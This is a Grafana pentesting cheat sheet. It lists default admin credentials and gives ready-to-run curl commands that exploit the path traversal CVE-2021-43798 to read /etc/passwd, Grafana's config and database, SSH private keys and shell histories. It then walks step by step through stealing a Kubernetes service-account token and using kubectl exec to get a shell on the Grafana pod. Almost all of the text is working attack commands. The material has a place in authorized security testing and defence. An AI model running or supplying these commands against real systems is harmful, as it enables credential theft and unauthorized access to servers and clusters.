Grafana Pentesting
Last modified: 2023-01-15
Grafana is a multi-platform analytics and interactive visualization web application.
Default Credential
admin:admin
admin:prom-operator
Configuration File
The configuration file contains the admin credentials. See the “admin_user” and “admin_password” section in the file.
/etc/grafana/grafana.ini
Path Traversal
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.bash_history
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.bash_history
Getting a Shell vis JWT, Grafana Pod
Some Grafana versions are vulnerable to Path Traversal. Kubernetes creates environment variables by default.
1. Check Environment Variables on the Target Machine
env
If you got the GRAFANA environment like the following, the Grafana service is running on the cluster.
GRAFANA_SERVICE_HOST=10.108.133.228
GRAFANA_PORT=tcp://10.108.133.228:3000
GRAFANA_PORT_3000_TCP=tcp://10.108.133.228:3000
2. Access the Grafana Dashboard
You can access the service at http://<grafana-ip>:<grafana-port>.
3. Get the JWT of the Service Account
Using Path Traversal (CVE-2021-43798).
curl --path-as-is http://<grafana-ip>:<grafana-port>/public/plugins/alertlist/../../../../../../../../etc/passwd
Get the token (JWT) of the service account.
curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token
4. Decode the JWT and Get Sensitive Information
See JWT Pentesting.
5. Check Your Permission of This Service
Using the JWT, you should get permissions.
kubectl auth can-i --list --token=<Grafana-JWT>
# List pods
kubectl get pods --token=<JWT>
6. Get a Shell on the Grafana Pod
kubectl exec -it <grafana-pod-name> --token=<Grafana-JWT> -- /bin/bash